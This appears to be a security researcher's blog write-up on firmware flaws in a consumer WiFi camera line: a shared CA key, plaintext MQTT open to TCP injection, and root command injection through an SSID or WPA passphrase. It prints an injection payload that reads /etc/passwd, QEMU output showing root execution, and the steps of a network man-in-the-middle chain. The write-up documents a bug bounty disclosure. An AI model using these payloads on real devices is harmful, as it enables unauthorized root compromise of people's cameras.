Born Insecure: What Firmware Analysis Reveals About IoT Security Debt
I spent several weeks analyzing the firmware and cloud communication protocol of a popular consumer WiFi camera line. Seven firmware images across six models spanning five years of production — from late 2019 through November 2024.
What I found wasn’t the kind of vulnerability that gets introduced by a bad commit or fixed in a patch Tuesday. These are architectural decisions made early in the product’s life that propagated unchanged across every model, every revision, every year. Shared cryptographic keys with trivially guessable passphrases. A plaintext cloud signaling channel with no integrity protection. An internal command execution daemon that pipes unsanitized input straight into system().
None of this is about end-of-life neglect. The newest firmware I analyzed was built in November 2024. These devices were born insecure.
The Research Setup#
The vendor’s firmware images are downloadable from their CDN without authentication — a common pattern in consumer IoT. Each image uses a vendor-specific container format with XOR-obfuscated headers, wrapping a SquashFS filesystem containing the Linux root filesystem and application binaries.
Tools used: binwalk for initial extraction, unsquashfs for filesystem access, Ghidra for static analysis of ARM binaries, Scapy for network-layer testing, and QEMU with FirmAE for dynamic analysis in an emulated environment.
One model shipped with unstripped binaries — full symbol names, function signatures, source file references. This became the Rosetta Stone for understanding the entire codebase, since the same application binary (with symbols stripped) appears across all other models.
Finding 1: One Key to Rule Them All#
Every Linux-based model ships with an identical certificate bundle containing three files: a self-signed CA certificate, its private key, and a server private key. Both private keys are encrypted — but the passphrases are single dictionary words hardcoded in the application binary, trivially recoverable with strings.
$ openssl rsa -in cakey.pem -passin pass:REDACTED
writing RSA key
-----BEGIN RSA KEY-----
[key material]
-----END RSA KEY-----
The CA certificate uses 1024-bit RSA with SHA-1 and expired years ago. The private key’s modulus matches — confirming it’s the real signing key, not a placeholder.
The same bundle — byte-for-byte identical — appears in all six Linux-based models I analyzed. MD5 hash matches across firmware images spanning five years.
At runtime, the device uses this CA key to sign per-device TLS certificates. Since every device shares the same CA private key, anyone who downloads any firmware image can forge certificates that the entire product line trusts.
But it gets worse. Binary disassembly of the main application reveals that four out of five outbound TLS contexts use SSL_VERIFY_NONE. The device doesn’t verify server certificates on most connections. And decompilation of the vendor’s mobile app reveals an UnSafeTrustManager that accepts any certificate from any server. Both ends of the communication chain fail to validate — making man-in-the-middle attacks trivial for a network-adjacent attacker.
Why This Matters#
This isn’t a misconfiguration. It’s an architectural choice: generate device certificates at runtime using a shared signing key. The approach was presumably simpler than provisioning unique keys per device during manufacturing. That shortcut, made once, propagated to every unit sold for five years.
When the vendor’s security team reviewed the finding, they responded that the keys were “legacy/deprecated.” But the firmware images containing them were still being distributed as of late 2024. Deprecation without removal is not remediation.
Finding 2: Plaintext Cloud Signaling#
The cameras communicate with their cloud platform using MQTT — a lightweight publish/subscribe protocol common in IoT. MQTT supports TLS. This vendor doesn’t use it.
The entire signaling channel runs over plaintext TCP. Every MQTT message — connection setup, topic subscriptions, command/control messages, alarm notifications — is visible to anyone on the same network segment.
Protocol: MQTT 3.1.1
Connect Flags: 0xAE (Username, WillRetain, WillQoS=1, Will, CleanSession)
Keepalive: 30 seconds
Username: [DEVICE_SERIAL] ← no password
Will Topic: /Basic/pu2cenplt/[DEVICE_SERIAL]/breakconnect
Authentication to the MQTT broker relies solely on the device serial number as the username. No password. The broker validates the serial against a registered device list (external clients are rejected), but a man-in-the-middle attacker doesn’t need to authenticate — they inject into the camera’s existing authenticated session.
TCP Stream Injection#
Because there’s no TLS (and therefore no record-layer MAC), a network-adjacent attacker can forge TCP segments containing arbitrary MQTT PUBLISH messages. The camera’s TCP stack accepts the forged packets, and the MQTT layer processes them.
I confirmed this by:
- ARP spoofing the camera on my test network
- Sniffing the live MQTT session to obtain TCP sequence/acknowledgment numbers
- Forging a TCP PSH+ACK segment from the cloud server’s IP containing an MQTT PUBLISH
- Observing the camera ACK the forged packet and respond with an MQTT DISCONNECT — confirming application-layer processing, not just TCP acknowledgment
The topic structure reveals the complete command/control hierarchy: device registration channels, ISAPI command channels (the same protocol used in the vendor’s parent company’s professional surveillance products), alarm notifications, video/media control, and platform configuration.
The Padding Oracle That Wasn’t#
The application-layer payloads within MQTT messages are encrypted. After confirming TCP injection worked, I spent considerable time investigating whether the encryption was vulnerable to a padding oracle attack.
The validation looked promising at first. Sending the original captured payload produced a response. Sending a payload with broken padding produced silence. Sending a payload with intact padding but modified ciphertext also produced silence. Classic padding oracle behavior — or so I thought.
After building a full brute-force framework with TCP session management, ARP spoofing, and per-byte oracle probing, I ran the actual attack: 0 out of 256 candidate bytes produced consistent responses across retries. The few hits were noise from the network.
The camera validates padding and content atomically. It doesn’t distinguish between a padding error and a content error — it drops all invalid messages silently. Only the exact original payload produces a response. Not a padding oracle.
This is worth documenting because most write-ups only show successful attacks. Recognizing a false positive — where the black-box behavior looks like an oracle but isn’t — is just as important as recognizing a real one. The tell was that the “broken padding” and “broken content” cases were indistinguishable.
Finding 3: sprintf to system() — The Command Injection Chain#
The main application binary on every Linux-based model contains a WiFi Access Point configuration function. When the device sets up its hotspot mode, it constructs a hostapd configuration file using sprintf() with the SSID and WPA passphrase interpolated directly into a shell command:
sprintf(buf,
"echo -e \"interface=%s\\nbridge=%s\\n...ssid=%s\\n"
"...wpa_passphrase=%s\\n\" > /path/hostapd.conf",
ifname, bridge, SSID, PASSPHRASE);
callSystemCmd(buf);
No sanitization. No escaping. No input validation. The SSID and passphrase values flow from the network command dispatch interface — the same interface that handles commands from the cloud platform and the mobile app.
callSystemCmd sends the formatted string over a Unix domain socket to a separate daemon (execSystemCmd) whose entire purpose is receiving strings and passing them to system(). This daemon runs as root, naturally.
Proving It in QEMU#
Since the device requires WiFi hardware for end-to-end exploitation (the NETCMD dispatch checks for a wireless interface before processing WiFi configuration commands), I demonstrated the injection primitive in an emulated environment. The QEMU setup boots the actual firmware filesystem with the real execSystemCmd daemon running:
=== Malicious passphrase: $(cat /etc/passwd > /tmp/pwned) ===
[*] system() returned: 0
[*] /tmp/pwned contents:
root:REDACTED:0:0:root:/root/:/bin/sh
=== Malicious SSID: backtick injection ===
[*] system() returned: 0
[*] /tmp/pwned contents:
ROOTED
=== File ownership ===
-rw-r--r-- 1 root root 43 /tmp/pwned
Root command execution through a crafted SSID. The same code path exists in all six Linux models, at the same relative offset, with the same format string.
The execSystemCmd Pattern#
The execSystemCmd daemon deserves special attention because it represents a broader antipattern in embedded Linux development. Rather than using execvp() or direct syscalls for system operations, the developers created a centralized “run any shell command” service accessible via Unix socket. Every component in the system — WiFi management, network configuration, firmware updates — sends shell command strings to this daemon.
This turns every sprintf call in the entire codebase into a potential command injection vector. It’s the embedded equivalent of building your entire web application on eval().
The Security Debt Compounding Problem#
What makes these findings significant isn’t any individual vulnerability — it’s the pattern of compounding.
The shared CA key enables man-in-the-middle. The plaintext MQTT channel enables session injection. The command injection chain enables root code execution through crafted configuration data. Each finding makes the others worse:
Shared CA key (MitM)
+ Plaintext MQTT (injection)
+ sprintf→system() (code execution)
= Remote root compromise from network adjacency
And all of it ships on every device, unchanged, for five years.
This is what “security debt” looks like in IoT. A design decision made in 2019 (or earlier) — use a shared CA key, skip TLS on MQTT, route everything through system() — becomes load-bearing architecture. It can’t be fixed without:
- Manufacturing-line changes (per-device key provisioning)
- Protocol migration (MQTT over TLS, breaking backward compatibility with existing cloud infrastructure)
- Application rewrite (replacing the
execSystemCmddaemon and every callsite)
Each of these is a major engineering effort. For a device that retails for $30-50 and has margins measured in single-digit percentages, the economic incentive to fix is… limited.
The Vendor Response#
I reported these findings through the vendor’s bug bounty program. The results:
- Shared CA key: Closed as duplicate. The keys were described as “legacy/deprecated” — though still shipping in current firmware.
- Plaintext MQTT + TCP injection: Rejected. The vendor argued that TCP acknowledgment doesn’t prove business-layer impact, and that “LAN access required” diminishes severity. They noted that TLS migration was underway.
- Command injection: Closed as duplicate. The vendor acknowledged it as a real issue but stated it was “already discovered and resolved during internal self-inspection” in a newer firmware version. They noted that exploitation required two levels of permission verification at the business layer.
The vendor’s position is defensible from a narrow scope: proving end-to-end exploitation requires hardware I don’t have, and “network-adjacent” is a real constraint on exploitability. But it misses the larger point. These aren’t edge cases or theoretical issues — they’re fundamental architecture that affects every unit in the field.
Lessons for Researchers#
1. One unstripped binary unlocks the whole fleet. If a vendor ships even one debug build across their product line, the symbol names transfer directly to the stripped builds of other models. Spend time finding it.
2. False positive oracles are common in IoT. Devices that drop all invalid messages silently can look like padding oracles when tested with only three cases (valid, broken padding, broken content). Always run the full brute-force before concluding you have an oracle — and verify that your “hit” case is actually distinguishable from noise.
3. Trace the full call chain before assuming injection. Some embedded frameworks use fork + execvp instead of system(), making shell injection impossible even when sprintf is present. Check whether callSystemCmd eventually hits system(), popen(), or execvp(). The difference is everything.
4. QEMU + FirmAE fills the hardware gap — but only partially. You can demonstrate code paths and injection primitives, but anything requiring hardware peripherals (WiFi, Bluetooth, USB) needs the real device. Be transparent about what you proved in emulation vs. what you inferred from static analysis.
5. Shared secrets are the gift that keeps giving. Identical cryptographic material across a product line means one firmware download compromises every device ever shipped. This is the highest-leverage finding type in IoT research — and vendors consistently underestimate its severity.
The Bigger Picture#
The devices I analyzed aren’t outliers. The patterns — shared keys, plaintext protocols, system() misuse — are endemic in consumer IoT, especially in products derived from surveillance/CCTV platforms that were originally designed for isolated networks and later adapted for cloud connectivity.
The “end of life” framing is a red herring. EOL means the vendor stops shipping patches. But the implication — that the device was secure before support ended — is usually wrong. The security debt was there from day one, compounding silently in millions of homes and offices.
The $30 camera on your shelf wasn’t made insecure by time. It was born that way.
The research described in this post was conducted under a legitimate bug bounty program on the author’s own devices and test network. Vendor-identifying information has been removed at the vendor’s request. No exploitation was performed against devices owned by others.
Tools referenced: Ghidra, FirmAE, Scapy, binwalk, bettercap.